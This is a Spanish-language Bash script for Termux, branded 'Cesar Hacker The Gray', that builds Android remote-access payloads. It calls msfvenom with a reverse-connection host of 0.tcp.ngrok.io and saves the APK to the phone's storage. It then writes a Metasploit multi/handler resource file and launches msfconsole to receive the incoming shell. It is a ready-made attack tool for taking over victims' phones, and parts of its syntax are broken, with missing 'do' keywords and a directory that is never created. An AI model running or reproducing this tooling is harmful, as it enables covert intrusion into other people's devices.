#!/data/data/com.termux/files/usr/bin/bash                              set -euo pipefail                                                       IFS=$'\n\t'
trap ctrl_c 2                                                          

# VAR
        R='\033[1;31m'
        G='\033[1;32m'                                                          Y='\033[1;33m'
        B='\033[1;34m'
        M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'
	clear
	echo
	echo "  +-------------------------------------------------------+"
printf       "$C  |               $Y Cesar Hacker The Gray $C                 |"
	echo "  +---------------------------+---------------------------+"
	echo "  |      __________________   |                           |"
	echo "  |  ==c(______(o(______(_()  | |------------|======[***  |"
	echo "  |             )=\           | |  EXPLOIT   \            |"
	echo "  |            // \\           | |_____________\_______    |"
	echo "  |           //   \\          | |==[msf >]============\   |"
	echo "  |          //     \\         | |______________________\  |"
	echo "  |         // RECON \\        | \(@)(@)(@)(@)(@)(@)(@)/   |"
	echo "  |        //         \\       |  *********************    |"
	echo "  +---------------------------+---------------------------+"
	echo "  |      o O o                |        \ \/\/\/ /         |"
	echo "  |              o O          |         )======(          |"
	echo "  |                 o         |       .'  LOOT            |"
	echo "  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |"
	echo "  | |    PAYLOAD     |  \___  |     /    (_||_     \      |"
	echo "  | |________________|__|)__| |    |     __||_)     |     |"
	echo "  | |(@)(@)   **|(@)(@)**|(@) |            ||             |"
	echo "  |  = = = = = = = = = = = =  |     '--------------'      |"
	echo "  +---------------------------+---------------------------+"

printf "$Y       V 0.2.1       $G Cesar Hacker The Gray"
echo
printf "$C [Cesar]$R Bamos a crear nuestro payload$W"                                                                                           printf "$C [Set]$R PAYLOAD$Y"                                                   while read -p " >> " PAYLOAD && [ -z $PAYLOAD ];              	 printf "\n $B
 [Gray] Beamos los requisitos 
                $W \n"

                                                                                                                                                printf "$C [Set]$Y LOCAL HOST$G"
        while read -p " >> " LHOST && [ -z $LHOST ]; do
                printf "\n $R
                [Gray] porfavor pon un IP [HOST]
                $W \n"
        done

printf "$C [Set]$Y http, https, tcp $G"
        while read -p " >> " TCP && [ -z $TCP ]; do
                printf "\n $R
                [Gray] porfavor ecoja uno
                $W \n"
        done
echo
sleep 3
printf "$C escriba esto en otra ventana"
echo
printf "$C ngrok $TCP (puerto deseado)"
echo
echo
printf "$C [Set]$Y nombre$G"
        while read -p " >> " MYAPK && [ -z $MYAPK ]; do
                printf "\n $R
                [Gray] nesesitamos un nuevo nombre de la apk
                $W \n"
        done


sleep 1

printf "$C [Set]$Y PAYLOAD$G"
        while read -p " >> " PAYLOAD && [ -z $PAYLOAD ]; do
                printf "\n $R
                [Gra] porfavor pon el tipo de Payload                                   $W \n"
	done


sleep 1

printf "$C [Set]$Y Puerto de ngrok 5$G"
        while read -p " >> " SSH && [ -z $SSH ]; do                          printf "\n $R                                                           [Gray] porfavor pon un puerto de 5 dijitos   
	$W \n" 
        
	done

printf "$C [Set]$Y Puerto 5 dijitoss$G"                                       while read -p " >> " SSH && [ -z $SSH ];                                  printf "\n $R                                                           [Gray] porfavor coloca un puerto de 5 dijitos                            $W \n"                                                               
echo 
echo
		clear
echo
printf "$C"
	echo "                __"
	echo " _ __ ___  ___ / _|_   _____ _ __   ___  _ __ ___"
	echo "|  _   _ \/ __| |_\ \ / / _ \  _ \ / _ \|  _   _ "
	echo "| | | | | \__ \  _|\ V /  __/ | | | (_) | | | | | |"
	echo "|_| |_| |_|___/_|   \_/ \___|_| |_|\___/|_| |_| |_|"
printf "$Y        Cesar Hacker The Gray"
echo
printf "$C tienes que tener activo esto ngrok $TCP (puerto deseado)"
echo
mkdir -p $HOME/Red/SSH
echo 
echo

echo
mkdir -p /sdcard/PAYLOAD
printf "$G"

msfvenom -p $PAYLOAD LHOST=0.tcp.ngrok.io LPORT=$SSH R > /sdcard/PAYLOAD/$MYAPK



printf "$C la apk se guardo en tu  memoria interna en una carpeta llamada PAYPOAD"
printf "$Y          presiona en enter para continuar"
        read enter
	clear
printf "$R"
	echo " _     _   _  ___  ____ _____     _     ____   ___  ____ _____"
	echo "| |   | | | |/ _ \/ ___|_   _|   | |   |  _ \ / _ \|  _ \_   _|"
	echo "| |   | |_| | | | \___ \ | |_____| |   | |_) | | | | |_) || |"
	echo "| |___|  _  | |_| |___) || |_____| |___|  __/| |_| |  _ < | |"
	echo "|_____|_| |_|\___/|____/ |_|     |_____|_|    \___/|_| \_\|_|"
echo
printf "$C [Set]$G LOCAL HOST $Y>> $LHOST"
echo
printf "$C [Set]$G LOCAL PORT$Y"
                while read -p " >> " LPORT && [ -z $LPORT ]; do
                        printf "\n $R                                                           [Gra] porfavor coloca un puerto
                        $W \n"
		done

	echo
        touch $HOME/Red/SSH/$MYAPK.rc                                           echo "ngrok $TCP $LPORT" >> $HOME/Red/SSH/$MYAPK.rc
	chmod +x $HOME/Red/SSH/$MYAPK.rc

printf "                $C Press$Y enter$C to continue$W"
        read enter
		clear
printf "$C"
	echo " __  __      _                  _       _ _"
	echo "|  \/  | ___| |_ __ _ ___ _ __ | | ___ (_) |_"
	echo "| |\/| |/ _ \ __/ _  / __|  _ \| |/ _ \| | __|"
	echo "| |  | |  __/ || (_| \__ \ |_) | | (_) | | |_"
	echo "|_|  |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|"
	echo "      v 4.17             |_|"
printf "$Y          Cesar Hacker The Gray"
        echo
        printf "$C [Cesar]$G Inisiamos metasploit con esta comfigurasion
        "
        sleep 1
        printf "$Y [!]$C PAYLOAD =$R $PAYLOAD \n"
        printf "$Y         [!]$C LHOST   =$R $LHOST \n"
        printf "$Y         [!]$C LPORT   =$R $LPORT \n"
        echo                                                            
	echo
        echo
        printf "$C [Gray]$R explotando.... $Y msfconsole . . .$W"
        echo
	touch $HOME/Red/Cesar/$MYAPK.rc
        echo "use exploit/multi/handler" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set PAYLOAD $PAYLOAD" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set LHOST $LHOST" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set LPORT $LPORT" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "run" >> $HOME/Red/Cesar/$MYAPK.rc
        chmod 777 $HOME/Red/Cesar/$MYAPK.rc
        echo "
        "
        msfconsole -q -r $HOME/Red/Cesar/$MYAPK.rc





